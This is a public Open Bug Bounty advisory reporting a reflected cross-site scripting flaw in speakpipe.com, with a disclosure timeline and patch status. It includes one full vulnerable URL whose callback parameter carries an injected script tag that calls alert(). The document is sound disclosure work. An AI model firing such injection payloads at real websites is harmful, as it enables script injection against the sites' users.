speakpipe.com XSS vulnerability

2017-06-06T18:10:00
ID OBB:245261
Type openbugbounty
Reporter djrootdz
Modified 2017-11-26T14:43:00

Description

Vulnerable URL:
https://www.speakpipe.com/widget_log?action_code=allow_button_problem&callback=jQuery16407747073988430202_1485569276886%27%22()%26%25%3Ctest%3E%3CScRiPt%20%3Ealert(%27OPENBUGBOUNTY%27)%3C/ScRiPt%3E&flash_version=24.0.0&ref_url=https://www.speakpipe.com/halloween-voicemail&speakpipe_id=3658&speakpipe_public_token=53hffuwiq8i0acip4i2rqwsva0r0k0qb&visitor_token=ZLAzxSIfZGB7jjlM&_=1485569372682
Details:

Description| Value
---|---
Patched:| Yes, on 26.11.2017
Latest check for patch:| 26.11.2017 14:43 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 125061
VIP website status:| No
speakpipe.com SSL connection:| Grade: F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 June, 2017 18:10 GMT
Generic security notifications sent to website owner| 6 June, 2017 18:12 GMT
Notification sent to subscribers (without technical details)| 6 June, 2017 22:17 GMT
Vulnerability details disclosed by researcher| 4 July, 2017 18:16 GMT
Vulnerability patched by the website owner| 26 November, 2017 14:43 GMT